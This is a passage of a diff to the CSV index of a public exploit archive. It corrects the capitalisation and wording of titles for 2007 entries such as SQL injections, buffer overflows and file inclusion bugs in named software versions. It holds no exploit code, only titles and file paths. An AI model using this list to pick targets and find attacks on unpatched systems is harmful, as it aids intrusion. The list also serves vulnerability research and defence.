Exploit",2007-07-10,callAX,windows,remote,0 +4171,platforms/php/webapps/4171.pl,"Mail Machine 3.989 - Local File Inclusion",2007-07-10,"H4 / XPK",php,webapps,0 4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak (PoC)",2007-07-10,dreyer,linux,local,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plugin 2.0 - Command Execution",2007-07-11,jmp-esp,php,webapps,0 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 - (show.php newspath) Local File Inclusion",2007-07-12,irk4z,php,webapps,0 @@ -3832,8 +3833,8 @@ id,file,description,date,author,platform,type,port 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service",2007-07-14,shinnai,multiple,dos,0 4182,platforms/php/webapps/4182.txt,"CMScout 1.23 - 'index.php' SQL Injection",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software - Multiple SQL Injections",2007-07-14,d3v1l,php,webapps,0 -4184,platforms/php/webapps/4184.txt,"Realtor 747 - 'index.php categoryid' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 -4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - 'directory.php cat_id' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 +4184,platforms/php/webapps/4184.txt,"Realtor 747 - 'index.php categoryId' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 +4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script - 'Directory.php cat_id' SQL Injection",2007-07-14,t0pP8uZz,php,webapps,0 4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 - 'search.php' SQL Injection",2007-07-14,pUm,php,webapps,0 4187,platforms/php/webapps/4187.txt,"Traffic Stats - 'referralUrl.php offset' SQL Injection",2007-07-16,t0pP8uZz,php,webapps,0 4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video - File Parsing Remote Code Execution (PoC)",2007-07-16,yunshu,windows,remote,0 @@ -3865,17 +3866,17 @@ id,file,description,date,author,platform,type,port 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow",2007-07-24,"Jared DeMott",windows,remote,0 -4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 +4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. Safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - (saveserver.php) Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory - 'index.php' Remote File Inclusion",2007-07-24,mozi,php,webapps,0 -4222,platforms/windows/remote/4222.c,"Windows RSH daemon 1.7 - Remote Buffer Overflow",2007-07-24,"Joey Mengele",windows,remote,514 +4222,platforms/windows/remote/4222.c,"Microsoft Windows RSH daemon 1.7 - Remote Buffer Overflow",2007-07-24,"Joey Mengele",windows,remote,514 4223,platforms/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow",2007-07-25,ZhenHan.Liu,windows,remote,143 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple SQL Injections",2007-07-25,bypass,php,webapps,0 4225,platforms/php/webapps/4225.txt,"IndexScript 2.8 - (show_cat.php cat_id) SQL Injection",2007-07-25,xssvgamer,php,webapps,0 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 -4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - SUBSCRIBE Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143 +4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0 @@ -3891,8 +3892,8 @@ id,file,description,date,author,platform,type,port 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0 4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow",2007-07-29,vade79,linux,remote,80 -4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0 -4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0 +4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 - (vielib.dll 2.2.5.42958) Remode Code Execution",2007-07-29,callAX,windows,remote,0 +4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 - CreateProcess Remote Code Execution",2007-07-30,callAX,windows,remote,0 4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0 4247,platforms/windows/remote/4247.c,"Borland Interbase 2007 SP1 - Create-Request Remote Overflow",2007-07-30,BackBone,windows,remote,3050 4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 @@ -3904,19 +3905,19 @@ id,file,description,date,author,platform,type,port 4254,platforms/php/webapps/4254.txt,"AuraCMS - (Forum Module) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 4255,platforms/windows/remote/4255.html,"CHILKAT ASP String - (CkString.dll 1.1) SaveToFile() Insecure Method",2007-08-05,shinnai,windows,remote,0 4256,platforms/php/webapps/4256.pl,"Envolution 1.1.0 - (topic) SQL Injection",2007-08-05,k1tk4t,php,webapps,0 -4257,platforms/windows/local/4257.c,"Panda Antivirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0 +4257,platforms/windows/local/4257.c,"Panda AntiVirus 2008 - Privilege Escalation",2007-08-05,tarkus,windows,local,0 4258,platforms/php/webapps/4258.txt,"la-nai CMS 1.2.14 - Multiple SQL Injections",2007-08-06,k1tk4t,php,webapps,0 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 - 'VDT70.dll NotSafe' Stack Overflow",2007-08-06,DeltahackingTEAM,windows,remote,0 4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)",2007-08-06,NetJackal,multiple,dos,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 - (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 4262,platforms/windows/local/4262.cpp,"Live for Speed S1/S2/Demo - '.ply' Buffer Overflow",2007-08-06,n00b,windows,local,0 4263,platforms/windows/local/4263.cpp,"Live for Speed S1/S2/Demo - '.spr' Buffer Overflow",2007-08-06,n00b,windows,local,0 -4264,platforms/cgi/webapps/4264.txt,"CartWeaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 -4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 +4264,platforms/cgi/webapps/4264.txt,"Cartweaver - 'Details.cfm ProdID' SQL Injection",2007-08-06,meoconx,cgi,webapps,0 +4265,platforms/php/webapps/4265.txt,"Prozilla Pub Site Directory - 'Directory.php cat' SQL Injection",2007-08-06,t0pP8uZz,php,webapps,0 4266,platforms/multiple/remote/4266.py,"BIND 9 0.3beta - DNS Cache Poisoning Exploit",2007-08-07,posedge,multiple,remote,0 4267,platforms/php/webapps/4267.txt,"PhpHostBot 1.06 - (svr_rootscript) Remote File Inclusion",2007-08-07,K-159,php,webapps,0 4268,platforms/php/webapps/4268.txt,"PHPNews 0.93 - (format_menue) Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 -4269,platforms/php/webapps/4269.txt,"frontaccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 +4269,platforms/php/webapps/4269.txt,"FrontAccounting 1.12 build 31 - Remote File Inclusion",2007-08-07,kezzap66345,php,webapps,0 4270,platforms/windows/local/4270.php,"PHP mSQL (msql_connect) - Local Buffer Overflow Exploit",2007-08-08,Inphex,windows,local,0 4271,platforms/php/webapps/4271.txt,"FishCart 3.2 RC2 - (fc_example.php) Remote File Inclusion",2007-08-08,k1n9k0ng,php,webapps,0 4272,platforms/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) - Denial of Service",2007-08-09,"Martin Kluge",windows,dos,0 @@ -3924,7 +3925,7 @@ id,file,description,date,author,platform,type,port 4274,platforms/windows/local/4274.php,"PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI)",2007-08-09,Inphex,windows,local,0 4275,platforms/php/webapps/4275.php,"PHP Blue Dragon CMS 3.0.0 - SQL Injection",2007-08-10,Kacper,php,webapps,0 4276,platforms/php/webapps/4276.txt,"PHP blue dragon CMS 3.0.0 - Remote File Inclusion",2007-08-10,Kacper,php,webapps,0 -4277,platforms/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution Exploit",2007-08-10,Kacper,php,webapps,0 +4277,platforms/php/webapps/4277.php,"PHP Blue Dragon CMS 3.0.0 - Remote Code Execution",2007-08-10,Kacper,php,webapps,0 4278,platforms/php/webapps/4278.txt,"Pixlie 1.7 - (pixlie.php root) Remote File Disclosure",2007-08-10,Rizgar,php,webapps,0 4279,platforms/windows/remote/4279.html,"Microsoft DXMedia SDK 6 - (SourceUrl) ActiveX Remote Code Execution",2007-08-10,h07,windows,remote,0 4280,platforms/windows/remote/4280.pl,"Savant 3.1 - GET Request Remote Overflow (Universal)",2007-08-12,"Jacopo Cervini",windows,remote,80 @@ -3934,26 +3935,26 @@ id,file,description,date,author,platform,type,port 4284,platforms/php/webapps/4284.txt,"Prozilla Webring Website Script - 'category.php cat' SQL Injection",2007-08-13,t0pP8uZz,php,webapps,0 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,windows,dos,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest - Web Login Bypass SQL Injection",2007-08-14,s4squatch,cgi,webapps,0 -4287,platforms/windows/remote/4287.py,"SurgeMail 38k - (SEARCH) Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 +4287,platforms/windows/remote/4287.py,"Surgemail 38k - (SEARCH) Remote Buffer Overflow",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 - HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade - 'search.php query' SQL Injection",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP 5.2.0 (Windows/x86) - (PHP_win32sti) Local Buffer Overflow (PoC)",2007-08-18,boecke,windows,dos,0 -4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authenticated Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 +4294,platforms/windows/dos/4294.pl,"Mercury SMTPD - Remote Pre-Authentication Stack Based Overrun (PoC)",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart 1.x.x - (cart.php) Remote File Inclusion",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - SQL Injection",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 - (3 SIP messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 - (10 SIP messages) Remote Denial of Service",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module - (uacomx.ocx 2.0.1) Remote Buffer Overflow Exploit",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 - (category_id) SQL Injection",2007-08-21,k1tk4t,php,webapps,0 -4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authenticated Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 +4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 - SMTPD CRAM-MD5 Pre-Authentication Remote Overflow",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (1)",2007-08-22,Inphex,windows,local,0 4303,platforms/windows/local/4303.php,"PHP 5.2.3 - (PHP_win32sti) Local Buffer Overflow (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,windows,dos,0 4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit 1.4 - 'id' SQL Injection",2007-08-23,ajann,php,webapps,0 -4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory - (cat) SQL Injection",2007-08-23,ajann,php,webapps,0 +4306,platforms/php/webapps/4306.txt,"Mambo Component Remository - (cat) SQL Injection",2007-08-23,ajann,php,webapps,0 4307,platforms/php/webapps/4307.txt,"Joomla Component RSfiles 1.0.2 - (path) File Download",2007-08-23,ajann,php,webapps,0 4308,platforms/php/webapps/4308.txt,"Joomla Component Nice Talk 0.9.3 - (tagid) SQL Injection",2007-08-23,ajann,php,webapps,0 4309,platforms/php/webapps/4309.txt,"Joomla Component EventList 0.8 - (did) SQL Injection",2007-08-23,ajann,php,webapps,0 @@ -3962,8 +3963,8 @@ id,file,description,date,author,platform,type,port 4312,platforms/linux/remote/4312.c,"ProFTPd 1.x (module mod_tls) - Remote Buffer Overflow",2007-08-24,netris,linux,remote,21 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 - (search) Blind SQL Injection",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension - Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 -4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authenticated Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 -4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authenticated EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 +4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server - Pre-Authentication Remote Buffer Overflow",2007-08-25,"Joxean Koret",linux,remote,389 +4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Authentication EIP Overwrite",2007-08-26,Heretic2,windows,remote,25 4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion",2007-08-26,bd0rk,php,webapps,0 4318,platforms/windows/dos/4318.php,"PHP 5.2.0 (Windows/x86) - (PHP_iisfunc.dll) Local Buffer Overflow (PoC)",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 - Remote Denial of Service",2007-08-27,MADYNES,hardware,dos,0 @@ -3984,14 +3985,14 @@ id,file,description,date,author,platform,type,port 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) - Video Remote Heap Overflow",2007-08-29,wushi,windows,remote,0 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 - (xGB.php) Remote Security Bypass",2007-08-29,DarkFuneral,php,webapps,0 -4337,platforms/windows/dos/4337.c,"Microsoft Windows - (GDI32.DLL) Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 +4337,platforms/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",windows,dos,0 4338,platforms/php/webapps/4338.pl,"ABC estore 3.0 - 'cat_id' Blind SQL Injection",2007-08-29,k1tk4t,php,webapps,0 4339,platforms/php/webapps/4339.txt,"PHPNS 1.1 - (shownews.php id) SQL Injection",2007-08-29,SmOk3,php,webapps,0 4340,platforms/php/webapps/4340.txt,"phpBG 0.9.1 - (rootdir) Remote File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4341,platforms/php/webapps/4341.txt,"Pakupaku CMS 0.4 - Remote File Upload / Local File Inclusion",2007-08-29,GoLd_M,php,webapps,0 4342,platforms/php/webapps/4342.txt,"NMDeluxe 2.0.0 - 'id' SQL Injection",2007-08-30,"not sec group",php,webapps,0 4343,platforms/cgi/webapps/4343.txt,"Ourspace 2.0.9 - (uploadmedia.cgi) Remote File Upload",2007-08-30,Don,cgi,webapps,0 -4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Authenticated Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 +4344,platforms/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - (pop3) Pre-Authentication Remote Overflow (PoC)",2007-08-30,rgod,windows,dos,0 4345,platforms/windows/local/4345.c,"Norman Virus Control - nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - SQL Injection",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 @@ -4002,21 +4003,21 @@ id,file,description,date,author,platform,type,port 4352,platforms/php/webapps/4352.txt,"Weblogicnet - (files_dir) Multiple Remote File Inclusion",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 - (error_view.php ID) SQL Injection",2007-09-02,k1tk4t,php,webapps,0 4354,platforms/windows/local/4354.py,"Virtual DJ 5.0 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 -4355,platforms/windows/local/4355.php,"OTSTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 +4355,platforms/windows/local/4355.php,"OtsTurntables 1.00 - '.m3u' Local Buffer Overflow",2007-09-02,0x58,windows,local,0 4356,platforms/php/webapps/4356.txt,"eNetman 20050830 - 'index.php' Remote File Inclusion",2007-09-03,JaheeM,php,webapps,0 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger - Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary - (STPHPLIB_DIR) Remote File Inclusion",2007-09-03,leetsecurity,php,webapps,0 -4359,platforms/multiple/dos/4359.txt,"Apple Quicktime < 7.2 - SMIL Remote Integer Overflow (PoC)",2007-09-03,"David Vaartjes",multiple,dos,0 +4359,platforms/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow (PoC)",2007-09-03,"David Vaartjes",multiple,dos,0 4360,platforms/windows/remote/4360.rb,"CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit)",2007-09-03,"Patrick Webster",windows,remote,0 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 - VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 -4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Transversal Exploit",2007-09-04,Katatafish,linux,remote,0 +4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b - Directory Traversal Exploit",2007-09-04,Katatafish,linux,remote,0 4363,platforms/php/webapps/4363.txt,"PHPOF 20040226 - (DB_adodb.class.php) Remote File Inclusion",2007-09-04,"ThE TiGeR",php,webapps,0 4364,platforms/windows/local/4364.php,"AtomixMP3 2.3 - '.pls' Local Buffer Overflow",2007-09-05,0x58,windows,local,0 -4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 +4365,platforms/php/webapps/4365.txt,"AnyInventory 2.0 - (Environment.php) Remote File Inclusion",2007-09-05,"ThE TiGeR",php,webapps,0 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 - glItemCom.dll SetInfo() Heap Overflow",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect - eng50.dll Remote Stack Overflow",2007-09-06,devcode,windows,remote,0 4368,platforms/php/webapps/4368.txt,"PHPMytourney - 'menu.php' Remote File Inclusion",2007-09-06,S.W.A.T.,php,webapps,0 -4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote (PoC)",2007-09-06,shinnai,windows,dos,0 +4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - (FPOLE.OCX 6.0.8450.0) - Remote (PoC)",2007-09-06,shinnai,windows,dos,0 4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE - (start.php) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite - (index.php dlid) SQL Injection",2007-09-07,k1tk4t,php,webapps,0 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 - glitemflat.dll SetClientInfo() Heap Overflow",2007-09-07,void,windows,remote,0 @@ -4025,7 +4026,7 @@ id,file,description,date,author,platform,type,port 4375,platforms/windows/dos/4375.txt,"BaoFeng2 - mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple SQL Injections",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS 1.0/2.2 - Remote File Inclusion",2007-09-08,"ThE TiGeR",php,webapps,0 -4378,platforms/php/webapps/4378.htm,"fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 +4378,platforms/php/webapps/4378.htm,"Fuzzylime CMS 3.0 - Local File Inclusion",2007-09-08,"not sec group",php,webapps,0 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server Distributed Management Objects - 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,windows,dos,0 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 - (blanko.preview.php) Local File Disclosure",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 - Multiple Remote File Inclusion",2007-09-08,"Nice Name Crew",php,webapps,0 @@ -4042,11 +4043,11 @@ id,file,description,date,author,platform,type,port 4392,platforms/multiple/local/4392.txt,"PHP 4.4.7 / 5.2.3 - MySQL/MySQL Injection Safe Mode Bypass",2007-09-10,"Mattias Bengtsson",multiple,local,0 4393,platforms/windows/remote/4393.html,"Microsoft Visual Studio 6.0 - (PDWizard.ocx) Remote Command Execution",2007-09-11,shinnai,windows,remote,0 4394,platforms/windows/remote/4394.html,"Microsoft Visual Studio 6.0 - (VBTOVSI.dll 1.0.0.0) File Overwrite",2007-09-11,shinnai,windows,remote,0 -4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - (root_path) Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 +4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0 4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0 -4397,platforms/php/webapps/4397.rb,"Wordpress 1.5.1.1 <= 2.2.2 Plugin - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 +4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 Plugin - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server - Distributed Management Objects Buffer Overflow Exploit",2007-09-12,96sysim,windows,remote,0 -4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) - Command Execution (PoC)",2007-09-12,pdp,multiple,remote,0 +4399,platforms/multiple/remote/4399.html,"Apple QuickTime (Multiple Browsers) - Command Execution (PoC)",2007-09-12,pdp,multiple,remote,0 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,windows,dos,0 @@ -4061,8 +4062,8 @@ id,file,description,date,author,platform,type,port 4412,platforms/php/webapps/4412.pl,"KwsPHP 1.0 - 'login.php' SQL Injection",2007-09-15,s4mi,php,webapps,0 4413,platforms/php/webapps/4413.pl,"KwsPHP 1.0 Member_Space Module - SQL Injection",2007-09-15,s4mi,php,webapps,0 4414,platforms/php/webapps/4414.pl,"KwsPHP 1.0 stats Module - SQL Injection",2007-09-15,s4mi,php,webapps,0 -4415,platforms/php/webapps/4415.txt,"joomla component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,php,webapps,0 -4416,platforms/php/webapps/4416.txt,"joomla component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,php,webapps,0 +4415,platforms/php/webapps/4415.txt,"joomla Component flash fun! 1.0 - Remote File Inclusion",2007-09-15,Morgan,php,webapps,0 +4416,platforms/php/webapps/4416.txt,"joomla Component joom12pic 1.0 - Remote File Inclusion",2007-09-16,Morgan,php,webapps,0 4417,platforms/php/webapps/4417.txt,"SimpCMS - (keyword) SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 4418,platforms/php/webapps/4418.sh,"Omnistar Article Manager Software - 'article.php' SQL Injection",2007-09-16,"Cold Zero",php,webapps,0 4419,platforms/php/webapps/4419.php,"Shop-Script FREE 2.0 - Remote Command Execution Exploit",2007-09-17,InATeam,php,webapps,0 @@ -4070,18 +4071,18 @@ id,file,description,date,author,platform,type,port 4421,platforms/php/webapps/4421.txt,"phpsyncml 0.1.2 - Remote File Inclusion",2007-09-18,S.W.A.T.,php,webapps,0 4422,platforms/php/webapps/4422.txt,"KwsPHP 1.0 sondages Module - SQL Injection",2007-09-18,Houssamix,php,webapps,0 4423,platforms/php/webapps/4423.txt,"modifyform - 'modifyform.html' Remote File Inclusion",2007-09-18,mozi,php,webapps,0 -4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0 +4424,platforms/windows/remote/4424.html,"Apple QuickTime /w IE .qtl Version XAS - Remote Exploit (PoC)",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo - Blind SQL Injection",2007-09-18,nexen,php,webapps,0 -4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Authenticated Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 -4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 +4426,platforms/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Remote Pre-Authentication Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",hardware,dos,0 +4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 - CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 